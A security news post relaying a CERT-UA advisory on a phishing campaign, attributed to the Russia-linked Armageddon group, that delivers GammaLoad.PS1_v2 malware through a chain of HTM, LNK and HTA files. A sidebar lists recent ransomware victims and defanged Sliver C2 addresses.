Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT

May 15, 2022

Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware.

Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject “On revenge in Kherson!” and containing the “Plan Kherson.htm” attachment.

The HTM-file will decode and create an archive named “Herson.rar”, which contains a file-shortcut named “Plan of approach and planting explosives on the objects of critical infrastructure of Kherson.lnk”.

Ukraine CERT-UA

Upon clicking on the link file, the HTA-file “precarious.xml” is loaded and executed leading to the creation and execution of files “desktop.txt” and “user.txt”.

In the last stage of the attack chain, the GammaLoad.PS1_v2 malware is downloaded and executed on the victim’s computer.

The government experts attributes the attack to the Russia-linked Armageddon APT (UAC-0010) (aka Gamaredon, Primitive Bear, Armageddon, Winterflounder, or Iron Tilden) which was involved in a long string of attacks against the local state organizations. 

“As a result, the malicious program GammaLoad.PS1_v2 will be downloaded to the computer (the mechanism of taking a screenshot and sending it to the management server has been implemented).” reads the advisory published by CERT-UA. “The activity is carried out by the group UAC-0010 (Armageddon).”

The Ukrainian CERT shared the indicators of compromise (IoCs) for this campaign.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, CERT-UA)

The post Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT appeared first on Security Affairs.

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source
Tags: , , ,

You may have missed

image

CACTUS Ransomware Victim: https://www[.]scanda[.]com[.]mx/

May 14, 2024
image

CACTUS Ransomware Victim: http://www[.]acfin[.]cl/

May 14, 2024
Sliver C2

Sliver C2 Detected – 191[.]233[.]253[.]225:31337

May 14, 2024
Sliver C2

Sliver C2 Detected – 107[.]173[.]87[.]151:31337

May 14, 2024
CISA Logo

CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities

May 14, 2024